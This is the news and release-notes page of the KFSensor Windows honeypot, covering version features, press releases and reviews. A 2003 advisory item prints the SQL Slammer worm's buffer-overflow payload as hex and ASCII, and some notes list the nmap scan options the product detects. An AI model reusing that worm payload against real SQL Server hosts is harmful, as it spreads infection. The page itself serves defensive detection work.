KFSensor

 

KFSensor News

KFSensor version 5.2 released

  • 5 December 2016

Full HTTPS support

The KFSensor HTTP simulated server now supports HTTPS as well as HTTP. This allows visitors to interact with port TCP 443 using encrypted TLS traffic as they would expect on that port.

KFSensor will dynamically generate a self signed certificate for use by the HTTPS simulated service. It is also possible for the simulated server to use a real certificate that has been added to the local Windows certificate store.

To add this feature to an existing installation, follow the steps below.

Admin action logging

Actions and configuration changes made by an administrator are now recorded in the KFSensor Monitor log file for auditing purposes.

The log files can be found using this search pattern.
C:\kfsensor\logs\sensmon_*.log

The log entries start with "Configuration changed:" and provide the date, user name and the configuration setting changed.

Signatures - filter on description and type

The signature engine has been enhanced to enable it to match special types packets that could not be previously identified. For example scan packets that do not contain any content can now be detected. This is useful to ignore legitimate servers that can send out unexpected packets. For example web proxies.

KFSensor version 5.1 released

  • 8 June 2016

Improved Stealth Scan detection

Stealth scans cover a range of techniques used by hackers and pen testers to identify hosts, fingerprint OS versions and to determine which ports are open on a host. These techniques involve sending non-standard network packets or non-standard packet sequencing gain a response from a host without establishing a full connection. These are rarely recorded in system log files and can evade detection by certain security products such as firewalls. nmap is the most popular stealth scanning tool.

KFSensor's detection of stealth scans has been improved in the following ways:

New Event type - Scan

When a network event can be positively identified as a scan then the event is assigned the event type "Scan". Previously these would have been recorded as type "Connection". An event with the type Scan is a much clearer indicator of malicious activity than a connection.

nmap Options decoded

Where possible a scan is decoded to show the nmap option that matches the scan technique. The event's Description field contains the matching nmap command line option.

The following options are individually identified:

  • nmap -sS
  • nmap -sN
  • nmap -sF
  • nmap -sX, Xmas scan
  • nmap -sM
  • nmap -sA
n.b. Other security tools and malware may implement the same techniques. The events from these will still be identified using the nmap option as that is the standard scanning tool.

Port Scan changed to Multi-port Scan

In previously versions a 'Port Scan' refereed to an attacker connecting to many different port numbers. This type of activity has been renamed a 'Multi-port Scan', to better describe it and to distinguish it from the new Scan event type.

Reports

New reports

Two new reports have been added that enable analysis of the new scan event type Top visitor by scan attacks Scan attacks by day

Better error reporting

The previous version would only show "Report Loading..." when a problem occurred. In the new version an error message wil be displayed.

Longer time outs

The report loading timeout has been increased from 10 to 60 seconds to cope with slow servers and large data sets.

Fix for missing days in charts

In the previous version chronological charts only contained data points for days that contained data and not for days that contained zero data. The lines drawn between data points would then be misleading as they would skip over the days with zero data. The new version adds data points for all days, so the lines match the data.

Updating indicator

A spinner indicator has been added to the Update button on the report filter to show that a report is being updated.

Better support for MySQL

The new version contains better handling of MySQL connection timeouts. In the previous version the service would need to be restarted after several hours.

KFSensor version 5.0 released

  • 4 May 2016

Reports and Graphs

KfSensor has a new reporting module that provides a variety of reports for advanced data analysis.

Sensor Status Information

To aid the management and administration of KFSensor installations each sensor now records a set of status data. This data provides useful information on the sensor itself and on its host machine. This is particularly useful when administering a large number of sensors, but is still useful with only a single installation.

A new user interface panel has been added below the port tree, in the bottom left of the window to display the sensor status information.

Examples of the Sensor Status Information are, how long the sensor has been running for; the list of the host’s IP addresses and the amount of free disk space.

Digital Signatures

All KFSensor modules and installation files are now digitally signed with a code signing certificate. This enables users to ensure that their copy of KFSensor is genuine and has not been tampered with. Our publisher name is “KeyFocus Ltd.” and that is the name used in the certificate.

Other Fixes

A number of minor fixes and improvements have been made to the system, in particular with the way the collation and logging modules handle larger data sets.

KFSensor version 4.12 released

  • 21 December 2015

More Listen definitions

24 more ports have been added to the standard configuration in this release. These have been identified as being popular targets for scanning and exploitation. They include new Trojans and new services increasingly found on networks such as Mongo and Minecraft.

Packet Data storage management

The management of packet data storage has been improved to enable the automatic deletion of old packet data. This ensures that the total packet data stored by KFSensor will not exceed a maximum size and fill up the available disk space.

To enable this functionality; select the Settings -> Network Protocol Analyzer menu and set the Retention Period field to a suitable value, such as 30 or 90 days.

IIS 8 Emulation

The Sim Server emulation of IIS now supports IIS version 8.

No reconfiguration should be necessary as the default setting is to select the IIS emulation automatically.

Better UDP Handling

KFSensor attempts to identify and ignore UDP traffic that is locally initiated. Certain routers do not always translate the source IP addresses of UDP response packets. This caused KFSensor to wrongly identify these as unknown packets and therefore raise events for them. New algorithms have been added to KFSensor’s packet analyser to identify this situation and reduce the number false positive events generated.

KFSensor version 4.11.4 released

  • 4 April 2015
Updated signature import support
  • Rulemaster has been updated to work with the new snort.org download format.
  • Support for importing the emergingthreats.net rule base.
  • Added support for the dsize snort rule option
Facility to replicate scenarios across sensors
  • To make it easier to set up multiple installations with the same custom configuration we have added the ability to easily export a scenario from one sensor and then import it into another sensor.
  • First configure one sensor exactly as you want it.
  • Then export the selected scenario from that sensor to a file.
  • Next import the file into another sensor. The listen and sim server definitions will then be identical to the first sensor.
  • Use the Edit Scenarios dialog box to export or import scenario definitions.
Improved support for ArcSight CEF Format Support
  • For HTTP traffic KFSensor now adds the URL, Host, User-Agent, and Referer fields to the event description. This makes these details available in CEF logging.
Bug fixes
  • Invalid event dates/times on virtual machines. When running Windows on a virtual machine there is a rare problem where the network card reports an incorrect time stamp. This was being picked up by KFSensor and reported as the time of the event. KFSensor has now been changed so that it double checks the accuracy of time events and corrects this issue before it gets logged.
  • External Console Applications. Certain applications require their own console in order to function properly. A new option has been added that provides one.
  • It is now possible to set zero as an option for the max emails alert setting.

KFSensor version 4.10.0 released

  • 20 August 2014
UDP Handling

The big change in this release is how KFSensor handles UDP traffic. In previous versions UDP was treated in much the same way as TCP. Both shared the same DOS limit and port scan settings. This worked reasonably well in the past, but the way UDP is being used has changed in recent years. This has resulted in much more UDP traffic being sent across local networks and led to a large number of unnecessary events being logged by KFSensor.

We have made many changes to the way KFSensor handles UDP traffic and the result of this is a big reduction in the number of UDP events generated. Fewer events make it easier to identify the important and unusual events that can indicate attacks on your network.

Recent Trends in UDP usage Continual broadcast: Applications like Dropbox, send out UDP broadcast messages every few seconds as a way of announcing their presence on the local network and discovering other machines running the same application. In the past this behaviour was restricted to DHCP.

Multicast: New Microsoft protocols such as Link-Local Multicast Name Resolution, cause multiple machines to respond by broadcasting UDP packets to the entire sub-net, instead of sending them direct to the requester.

UDP System Improvements

UDP Specific DOS Settings

The DOS Settings dialog has been changed from a single page to a dialog with multiple tabs, one for each protocol. The UDP and TCP protocols now have their own settings and limits. This enables a greater degree of control and allows for differences in the way protocols work to be reflected in how they are handled.

Port specific limits

Each UDP port now has its own limits. This means that when the limit is reached then only traffic on that UDP port will be ignored from a host. For example this means only 3 dropbox broadcasts will be recorded for each machine and this will not affect the recording of any other types of UDP traffic from those machines.

In previous version it was possible to port specific limits for specified ports. In the new version all ports are given their own limit automatically.

Ignore expires

In previous versions a traffic that had triggered an ignore rule would keep that ignore state until the sensor was restarted. Now the ignore status can be set to expire, the default for this is 24 hours.

Better matching of outgoing and incoming UDP

KFSensor is now better at matching UDP traffic received in response to a request sent from the KFSensor host itself. This enables it to ignore such traffic, while still able to generate events for unexpected traffic.

IP fragmentation

KFSensor now handles IP fragmented packets in a better way, stopping the occasional event being mis-recorded because of malformed packets. Better HTML reports

The layout of exported events has been improved, by adding styling to the HTML output.

The File->Export->Event List option not default to HTML as the default output.

If required, the report styling can be configured by editing the C:\kfsensor\conf eportstyle.css configuration file.

KFSensor version 4.9.2 released

  • 21 May 2013
Support for 64-bit Windows

KFSensor has always worked on 32-bit versions of Windows. It has also worked on 64-bit Windows, but there were limitations on certain features and there were a few stability problems with the network packet captures module. This meant we did not claim to support 64-bit versions of Windows.

With version 4.9 we have done extensive testing on 64-bit versions and identified and fixed known issues on that environment.

So we now officially support 64-bit versions of the following Windows versions:

  • Windows 7
  • Windows 8
  • Windows Server 2008 R2
Windows audit monitoring

The best way for a honeypot to maximize the information on an attack is to give as realistic a service response as possible to an attacker. The ideal is to use the real service, however this has not been practical due to the risks of compromise involved.

In the past KFSensor has attempted to replace every Windows service with a simulated service to allow safe detection of threats. Windows services such as IIS and RPC were notoriously vulnerable to attack, especially on machines connected directly to the public Internet.

Microsoft have made huge improvements to the security of Windows in recent years and a properly patched modern version of Windows is safe enough to use on an internal network, without taking special measures to lock it down. Such machines are still a target for attack though weak passwords on RDP and open file shares are exploited.

KFSensor has long been able to monitor the network traffic of other services and log events in the same way as its own simulated services. This has been improved upon in version 4.9 by enabling KFSensor to monitor the auditing features of Windows itself to get more information on an attack.

This approach enables the use of Windows share folders to be set up and monitored by KFSensor. Extra information, such as the domain user account and windows machine name of an attacker can now be captured as well as the machine?s IP address.

Events logged as a result of information from Windows services are identified by the new ?WIN? protocol, which is used to distinguish them from events derived from the standard networking protocols such as TCP and UDP.

This functionality is enabled by default in KFSensor, but there is extra configuration work required to enable the correct Windows audit settings to be configured. A new section ?Windows Audit configuration? has been added to the manual giving a detailed guide to what needs to be done.

MySQL support

Recent versions of MySQL introduced new reserved words that meant KFSensor was no longer compatible with it. The new version of KFSensor now supports MySQL.

These changes require an existing KFSensor database to be updated, even if it is running on SQL Server.

To perform the database update, after upgrading to version 4.9, go to the Settings -> Log Database? menu and press the Configure button.

KFSensor version 4.8.0 released

  • 16 August 2012
ArcSight CEF Format Support
  • KFSensor can be configured to forward events to ArcSight in CEF format. This streamlines and simplifies the integration of KFSensor with the Arcsight Enterprise Threat and Risk Management (ETRM) platform.
  • The Common Event Format (CEF) is an open log management standard that improves the interoperability of security-related information from different security and network devices and applications. CEF is the first log management standard to support a broad range of device types. CEF enables technology companies and customers to use a common event log format so that data can easily be collected and aggregated for analysis by an enterprise management system.
  • Setting up KFSensor to integrate with ArcSight is simply a matter of opening the SysLog Alerts menu option and entering the ArcSight server IP address and selecting CEF as the alter format.
Visitor Rule Distribution
  • Centrally defined visitor rules can now be distributed to all sensors automatically. This makes it faster and easier to reduce false positive results consistently across all sensors.
  • To make use of this facility define a new rule on the local sensor on the KFSensor administrator machine. The collator service will then distribute this rule to all sensors.
  • The full enterprise configuration must be enabled for this to work.
Common Configuration file
  • To make it easier to set up new sensors with a standard configuration a new local configuration file is now created that contains the machine specific information. This allows the main configuration file to be replaced without loosing the machine specific settings.

KFSensor version 4.7.0 released

  • 1 March 2010
Windows 7 Compatibility
  • The simulated servers such as IIS, FTP and shell have been updated to be able to simulate Windows 7
  • Various internal compatibility updates to support Windows 7.
Automatic simulation selection
  • Simulated servers such as IIS can simulate several different versions.
  • The selection of the version is now set to automatic, which enables the appropriate simulation to be selected for the base operating system.
  • Specific simulation version selection can still be made in the configuration
WinPcap
  • KFSensor now supports WinPcap version WinPcap 4.1.1 (This is now the preferred KFSensor version)
Message Queuing Service
  • Added definitions for services specific to the Message Queuing Service
New Scanner Friendly DOS Setting
  • The default DOS Attack settings detect scanners, such as NMAP and block them after a few scans
  • A new 'Scanner Fiendly' button has been added to the 'DOS Attack Settings' dialog box.
  • The Scanner Friendly setting massively increases the DOS settings allowing a full scan of the KFSensor machine to be run

KFSensor version 4.5.0 released

  • 3 July 2008
New Features
Full Enterprise Mode

This version introduces major enhancements to the way in which KFSensor Enterprise operates. Together these enhancements have been named Full Enterprise Mode.

In the Full Enterprise Mode events from each sensor are inserted into a central database and copies of each sensor's event log files are additionally made on the Administration installation. This is done automatically by a background service on the Administration machine.

The Full Enterprise Mode provides these benefits:
  • Improved performance
    The Administration console has faster local access to each sensor's events.
  • Central store of events
    Making a central copy of all events from each Sensor means there is less need to make regular backup of the Sensor machines disks drives. Storing all events on a central database also makes it easier to develop custom reports of all the activity on the entire network.
  • Easier signature rule base management
    Simply update the signatures on the Administration machine and have it deployed to each sensor automatically and securely.
  • Central alerts
    Each Sensor can be configured to send alerts, for example by email. In the Full Enterprise Mode there is the option of sending the alerts from the Administration machine instead of the Sensor machine. Handling the sending of alerts from all sensors in one location makes configuration easier. It also gets around common problems, such as a Sensor located in a DMZ not having access to the internal SMTP server to send an email alert.
  • Runs in the background
    These benefits are provided by a systems service, so it works without the need for a user to be logged on.

Enabling Full Enterprise Mode requires additional but straight forward configuration that is fully described in the KFSensor Administration Guide. This is an optional feature and can be enabled or disabled at ant time. So there is no need to postpone upgrading to the new version.

Vista ports
  • Added definitions for services specific to Windows Vista
  • Web Services for Devices
  • IIS version 7 simulator
WinPcap
  • KFSensor now supports the latest WinPcap version 4.1.
Memory managements
  • Improvements to the code have resulted in a smaller memory foot print, which will aid systems performance in cases of heavy load.

KFSensor version 4.4.0 released

  • 2 November 2007
New Features
MySql Server - Sim Std Servers
  • Handles protocol negotiation
  • Decrypts packets
  • Allows visitor to browse database schemas
WinPcap
  • KFSensor now supports WinPcap version 4.0.
Ignore broadcasts
  • The visitor rules can now take the sensor ip address as a condition
  • This allows rules to be written specific to the broadcast address.
  • e.g. ignore all UDP broadcasts on a particular port.
Other
  • Increased session limits
  • Reduced memory requirements

KFSensor version 4.3.0 released

  • 11 December 2006
New Features
Vista Compatibility
  • Previous versions of KFSensor will work with Windows Vista, but require an elevated level of admin access rights.
  • The location of the KFSensor configuration files has been moved in new version to make configuration easier with Windows Vista.
  • A new setting in the Server Settings dialog called "Home Root Path" allows this directory to be changed.
WinPcap
  • KFSensor now supports WinPcap version 4.0 beta 2.
Signature Rule Flags
  • New feature to allow more complex rules to be developed.
  • Better supports rules from publicly available sources, resulting in less false positives.

KFSensor version 4.2.0 released

  • 16 June 2006
New Features
This point release contains a number on minor enhancements that were made from user feed back.
EMail Event Filter
  • The EMail alert filter functionality has been enhanced in version 4.2
  • It is now possible to specify how many email alters can be sent in each time period
  • There is a separate limit for each visitor and for the total
Signature Rule Event Severity Options
  • A signature rule contains the option to change the severity of an event. This may have the effect reducing the severity set by listen definition. In order to control this behavior there are three different options:
Event On (Port Scan)
  • This option is used to monitor the number of different ports in the same way as the option above. When the limit is reach for this setting then a port scan event will be logged.
  • This enables port scans to be detected without blocking the visitor.
Check For New Version Update
  • This new menu option checks with the KeyFocus web site to see if you are running the latest version.

KFSensor is available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.

KFSensor version 4.1.0 released

  • 8 May 2006
New Features
Color Coding
  • Each event in the event view is assigned a color based on its protocol and severity.
  • Port and visitors are assigned a color based on how recent their last activity is.
  • All colors are customizable through the new Event Colors dialog box.
Visitor Rules
  • Quick Create Visitor Rule option added as a right click context menu option on the events view and as a button on the Event Details dialog.
  • Visitor rules have been extended to allow a host computer's DNS name to be specified, instead of just the IP address.
    This is useful when writing a rule to exclude a host that uses dynamic IP allocation.
Multiple IPs
  • The Scenario Change All dialog has been enhanced to make it easier to set up different behaviour for each IP hosted by the machine.
Bug fix
  • Problems logging to a MS SQL Server database have been resolved

KFSensor is available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.

KFSensor version 4.0.1 released

  • 4 January 2006
KFSensor Standard Edition KFSensor Standard is the newest edition to the KFSensor range.
It provides all the core features required to run an effective honeypot system at a basic price. New Professional Edition Features
Network Protocol Analyzer
  • Detects connections to all TCP and UDP ports, even closed ports
  • Detects ICMP messages
Native Listen Type
  • Monitors production software services as part of the honeypot
Improved Port Management
  • All listen definitions associated with a service class
  • Enables whole classes of services to be added or removed from a scenario
Port hiding
  • Little used ports can now be hidden, until an event occurs
  • Makes port interface more manageable
DHCP Sim Server
  • Provides protocol decoding for this important service
Import Events
  • Import events stored in a log file into an ODBC database

KFSensor is now available in three editions; Standard, Professional and Enterprise.
To compare which features are available in each edition view the Compare Edition page.

KFSensor version 3.0.4 released

  • 25 July 2005
New Features
Remote Administration - KFSensor Enterprise
  • Ability to control multiple sensors from one monitor.
  • Ability to view events from multiple sensors from one monitor.
High Security Communications
  • Both client and server authentication with 3072 bit RSA public/private keys
  • 256 bit AES encrypted data traffic
  • Randomized data contents and data sizes to avoid all signatures
Signature Engine
  • KFSensor is the first product to combine the benefits of signature-based IDS with a honeypot system.
  • Fast signature search engine, which has a minimal impact on system performance.
  • Handles thousands of rules
  • String, regular expressions and byte testing rules supported
  • Easy maintenance and updating of new rules from different sources
  • Create new rules directly from an event
  • Export rules in KFSensor or Snort format
New Port and Event Icons
  • Eight different icons to represent different service types
  • Easier to distinguish different types of events
New Event Details Dialog
  • Multi-tabbed Event details dialog
  • Four different information layouts
  • More details available for each event
Easy Scenario Upgrade
  • New dialog to import new sim server and listen definitions
  • Easy to update existing installation with the latest threats
Scanner cloaking
  • Vulnerability scanners attempt to interrogate every open port on a target server
  • It is now possible to specify the maximum number of ports a visitor can connect to before being locked out
CMD Command console - Sim Std Server
  • Emulates the Windows command shell, otherwise known as a DOS box
  • As used by a number of worms to install a root kit

Windows & .NET Magazine - Lab Report

  • 2 April 2004

The April edition of Windows & .NET Magazine features an in-depth lab report on Honeypots for Windows.

This is what they had to say about KFSensor:

"KFSensor appears to be the only virtual honeypot in this review with a clear sense of what it takes to appear to be a Windows host."

"This functionality puts KFSensor in the top echelon of Windows honeypots."

"If you want a feature-packed Windows honeypot that's easy to install and use, KFSensor is the clear choice for you."

Windows & .NET Magazine

Read the lab report on Windows & .NET Magazine's web site

KFSensor version 2.1.4 released

  • 22 March 2004
New Anti-spam technology
The KFSensor 2.1.4. contains innovative new technology and dozens of enhancements that enables it to intercept and block spam.

Exploiting insecure HTTP proxy and SOCKS servers is now the preferred method used by spammers to relay large quantities of spam, whilst maintaining their own anonymity.

By emulating these insecure servers KFSensor is able to deceive spammers into using its honeypot to attempt to send spam whilst secretly blocking the spam from being relayed to its intended victim.

A typical deployment of KFSensor can block an average of 500,000 spam messages a day and provide valuable information that can identify the true source of the spam it blocks.

For more details click here.

Major New features in version 2.1.4

SOCKS - Sim Std Server
  • Handles protocol negotiation
  • Supports SOCKS 4/4A/5
  • Handles proxy chaining requests
  • Redirects proxy connections to internal emulations
  • Various tricks to fool proxy testing scripts
  • Eight different configuration levels
HTTP Proxy
  • Extension of HTTP emulation to cover HTTP and CONNECT proxying
  • Eight different configuration levels
Proxy rules
  • Use an external script to provide logic to determine if a proxy connection should be allowed
  • Process captured spam to produce custom reports
  • Works for all proxy types; SOCKS, HTTP and SMTP relay
New DOS Attack Options
  • Options to enable KFSensor to accept a large number of connections with locking out a visitor, or generating too many events
MS SQL Server - Sim Std Servers
  • Handles protocol negotiation
  • Decrypts login packets
  • Correctly refuses login requests
  • Handles SQL Server UDP information requests
Many extra minor enhacements and updates

KeyFocus announces the world's first Windows networking emulation honeypot

  • 31 Oct 2003

For Immediate Release

KeyFocus, an Internet security provider, announces the world's first Windows networking emulation honeypot, a key feature of the major new release of its flagship product KFSensor 2.0, its honeypot based intrusion detection system.

This groundbreaking technology enables KFSensor to detect the nature of attacks on file shares and Windows administrative services – currently the most prevalent and damaging of all illicit intrusions performed over the Internet.

Firewalls can detect port scans, but they cannot identify the nature of an. Network Intrusion Detection Systems can identify certain attacks, but not without running the risk of jeopardizing security. Only KFSensor can provide optimal information on an attack, without the risk of compromise.

KFSensor emulates all four of Microsoft’s NetBIOS and SMB/CFIS services, allowing hackers and a whole class of worms – such as Randex and Opaserv, to attempt to exploit insecure file shares and other vulnerabilities in a secure environment. Consequently, KFSensor provides a level of analysis never before available to security professionals.

The already extensive emulation and reporting features of KFSensor have been further extended – adding the capability for users to write their own scripts and database queries. These are compatible with scripts written for the Honeyd system.

About KFSensor
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.

The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard systems services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.

KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.

KFSensor is a second generation honeypot application for Windows NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.

About KeyFocus
KeyFocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization’s existing security infrastructure. KeyFocus Ltd. is a privately funded and based in London, England.

KFSensor version 2.0 Release Notes

  • 31 Oct 2003
New features
Improved Manual
  • New KFSensor Administration Guide
External Console Applications
  • Use languages like C, PERL and Python
  • Operation and logging compatible with the built in Sim Servers
  • Compatible with scripts written for Honeyd
  • Sample scripts included
External Alerts
  • Process all or selected alerts using a custom external application
  • Launch an immediate port scan on the IP address of a visitor to the honeypot
  • Create you own custom event log file
  • Send alerts to a third part application
  • Use languages like C, PERL and Python
NBT Sim Std Servers
  • KFSensor can emulate Microsoft's NetBIOS and SMB/CIFS services
  • Insecure file shares are one of the most common and potentially dangerous security vulnerabilities exploited
  • Decodes NBT and SMB packets and logs them in a human readable form
  • Allows worms to upload malicious code to a secure area, for analysis
  • All four NBT services emulated
    • NBT Name Service - UDP 137
    • NBT Datagram Service - UDP 138
    • NBT Session Service - TCP 139
    • NBT SMB Raw - TCP 445
Database Log Enhancement
  • KFSensor not has the option to save binary data, encoded as text into a long char, or Memo field in the database, which can make for easier external analysis of the database.

Information Security Magazine review

  • 20 Oct 2003

Information Security Magazine have reviewed KFSensor in their October edition.

Read the review at Information Security's web site

KeyFocus launches version 1.4 of KFSensor, its honeypot based intrusion detection system.

  • 11 Jul 2003

For Immediate Release

KeyFocus, an Internet security provider, launches version 1.4 of KFSensor, its honeypot based intrusion detection system.

KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.

The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard systems services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.

KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.

KFSensor is a second generation honeypot application for Windows 98/Me/NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.

About KeyFocus
Keyfocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization’s existing security infrastructure. KeyFocus Ltd. is a privately funded and based in London, England.

KFSensor, version 1.4.0 released

  • 7 Jul 2003
New features
  • SysLog Alerts
    KFSensor can now send alerts to a UNIX SysLog server.
  • Event Log Alerts
    KFSensor can now send alerts to the Windows Event Log.
  • New type of Sim Std Server - Terminal Server
    KFSensor now emulates a MS Terminal Server server.

KFSensor, version 1.3.0 released

  • 4 Jun 2003
New features
  • High Integrity Version
    KFSensor now contains two versions. The high integrity version has certain potential higher risk features removed.
  • High Secuirty Configuration
    Detailed instructions have been included in the manual on how to configure the KFSensor installation for maximum security.
  • Edit Log Path
    The directory in which KFSensor stores its log files can now be changed
  • Edit Admin Port
    You can now change the port on which the KFSensor monitor and server communicate
  • New type of Sim Std Server - VNC
    KFSensor now emulates a VNC server.

KFSensor, version 1.2.0 released

  • 13 May 2003
New Upgraded version:
    More standard simulated servers
    • HTTP Simulated Server Sophisticated emulation of Microsoft's IIS web server
    • FTP Simulated Server File Transfer Protocol emulation
    • POP3 Simulated Server Post Office Protocol emulation
    Other new features
    • Dynamic binding It is now possible to bind to dynamically assigned IP addresses
    • Improved tool bar More actions on the tool bar for easier access to functionality

    Download it here

KFSensor, version 1.0.4 released

  • 19 Mar 2003
Changes
  • Alert EMails
    In addition to recording events in the event log and providing audio and system tray alerts, KFSensor is able to send alerts by email.
  • New type of Sim Std Server - Telnet
    KFSensor now emulates the Telnet protocol.
  • New type of Sim Std Server - Relay
    A Relay server can be used to allow visitors to access a service running on another machine.
  • New feature for the SMTP Sim Std Server
    The SMTP Sim Std Server can now optionally relay a limited number of emails. This is needed to trap spammers.

    Download it here

  • KFSensor, version 1.0.3 released

    • 28 Feb 2003
    Changes
    • Denial Of Service Attack Protection
      The KFSensor Server is very fast at responding to visitors.
      On a reasonably quick internet connection the server can easily handle several million requests per hour. This would not pose a problem for the server itself, but it would cause the logs to grow very large.
      To prevent a hacker generating an excessive amount of events KFSensor implements various limits on the amount of traffic it will accept.
    • New type of Sim Std Server
      A Sim Standard Server is a sophisticated emulation of a real server.
      The level of deception is much higher than with a Sim Banner and provides much more detailed information for analyzing an attack.
      The first Sim Std Server server introduced in this release is for the SMTP emulation.
    • Server Domain Name, added to Scenario
      This is the domain name used to identify the server to a visitor. It is used in various protocols such as SMTP. This could be the real domain name of the machine or a fictious one.
    • Bug Fix - Monitor Error
      On starting up KFSensor a few monitor errors could be logged. This has now been fixed.

      Download it here

    KFSensor, version 1.0.2 released

    • 13 Feb 2003
    Changes
    • Load Events
      KFSensor can now display events from any time in the past.
    • Hide Events
      Events can now be hidden based on date or severity level.
    • Export
      Writes event details to a file, in one of these number of formats; HTML, XML, TSV or CSV
    • Event Severity
      All events now have a severity level of low, medium or high. These are color coded on the events view and generate different types of alerts.
    • Improved reliability
      The reliability of the link between the monitor and the server has been improved.

    SQL Slammer Worm

    • 26 Jan 2003

    A new worm that attacks and exploits a vulnerability in Microsoft's SQL Server rapidly infected thousands of machines after it was launched on the 25 Jan 2003.

    The worm spreads by sending a UDP message to port 1434, which causes a buffer overflow. The message is only 376 bytes long.

    We are picking up on average of 5 of these attacks an hour.

    p>The SQL Slammer Worm payload looks like this:

    [04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0]B[EB 0E 01 01 01 01 01 01 01]p[AE] B[01]p[AE]B[90 90 90 90 90 90 90 90]h[DC C9 B0]B[B8 01 01 01 01]1[C9 B1 18]P[E2 FD]5[01 01 01 05]P[89 E5] Qh.dllhel32hkernQhounthickChGetTf[B9]llQh32.dhws2_f[B9]etQhsockf[B9]toQhsend[BE 18 10 AE]B[8D]E[D4]P[FF 16] P[8D]E[E0]P[8D]E[F0]P[FF 16]P[BE 10 10 AE]B[8B 1E 8B 03]=U[8B EC]Qt[05 BE 1C 10 AE]B[FF 16 FF D0]1[C9]QQP [81 F1 03 01 04 9B 81 F1 01 01 01 01]Q[8D]E[CC]P[8B]E[C0]P[FF 16]j[11]j[02]j[02 FF D0]P[8D]E[C4]P[8B]E[C0]P [FF 16 89 C6] [DB 81 F3]

    Links
    BBC
    CERT

    KeyFocus Release Intrusion Detection System

    • 24 Jan 2003
    London, UK
    January 24, 2003 - KeyFocus, Ltd announce the beta release of KFSensor, an Intrusion Detection System (IDS).

    About KFSensor
    KFSensor is a host based Intrusion Detection System (IDS). It acts as a honey pot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attack and security alerts. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

    Copyright © 2003-2016 KeyFocus Ltd. All rights reserved.